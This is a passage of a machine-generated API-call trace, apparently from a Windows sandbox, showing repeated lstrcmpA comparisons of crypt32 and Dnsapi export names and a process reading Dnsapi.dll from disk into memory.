(lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0107.450] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0107.450] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0107.450] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0107.450] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0107.450] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0107.450] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0107.450] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0107.450] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0107.450] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0107.451] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0107.451] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0107.451] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0107.451] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0107.451] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0107.451] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0107.451] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0107.451] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0107.451] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0107.451] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0107.451] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0107.451] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0107.451] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0107.451] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0107.451] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0107.451] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0107.451] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0107.451] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0107.451] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0107.451] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0107.451] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0107.451] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0107.451] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0107.451] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0107.452] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0107.452] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0107.452] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0107.452] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0107.452] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0107.452] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0107.452] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0107.452] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0107.452] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0107.452] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0107.452] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0107.452] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0107.452] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0107.452] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0107.452] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0107.452] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0107.452] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0107.452] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0107.452] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0107.452] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0107.452] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0107.452] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0107.452] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0107.452] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0107.453] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0107.453] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0107.453] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0107.453] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0107.453] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0107.453] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0107.453] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0107.453] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0107.453] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0107.453] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0107.453] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0107.453] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0107.453] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0107.453] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0107.453] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0107.453] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0107.453] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0107.453] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0107.453] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0107.453] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0107.453] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0107.453] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0107.453] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0107.453] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0107.453] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0107.453] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0107.453] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0107.453] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0107.453] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0107.454] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0107.454] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0107.455] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0107.455] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0107.455] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0107.456] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0107.456] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0107.456] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0107.456] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0107.456] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0107.456] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0107.456] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0107.456] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0107.456] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0107.456] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0107.456] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0107.456] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0107.456] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0107.456] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0107.456] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0107.456] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0107.456] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0107.456] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0107.456] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0107.457] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0107.457] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0107.457] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0107.457] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0107.457] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0107.457] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0107.457] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0107.457] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0107.457] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0107.457] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0107.457] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0107.457] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0107.457] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0107.457] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0107.457] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0107.457] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0107.457] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0107.669] GetProcessHeap () returned 0x430000 [0107.669] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x411a040 | out: hHeap=0x430000) returned 1 [0107.677] GetProcessHeap () returned 0x430000 [0107.677] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x4491e0 [0107.677] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0107.689] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0107.689] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0107.690] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0107.690] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0107.690] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0107.690] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0107.690] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0107.690] GetProcessHeap () returned 0x430000 [0107.690] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xa7b88) returned 0x3a8d010 [0107.692] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0107.692] ReadFile (in: hFile=0x17c, lpBuffer=0x3a8d010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3a8d010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0107.944] CloseHandle (hObject=0x17c) returned 1 [0107.945] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0107.945] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.945] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0107.945] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.945] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0107.945] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0107.945] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.945] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0107.945] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0107.945] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0107.945] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.945] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0107.945] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0107.945] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0107.946] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0107.946] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.946] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0107.946] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0107.946] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0107.946] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0107.946] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0107.946] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.946] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0107.946] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0107.946] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0107.946] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0107.946] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0107.946] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0107.946] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.946] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0107.946] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0107.946] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0107.946] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0107.946] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0107.946] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0107.946] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0107.946] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0107.946] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0107.946] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0107.947] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0107.947] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0107.947] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0107.947] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 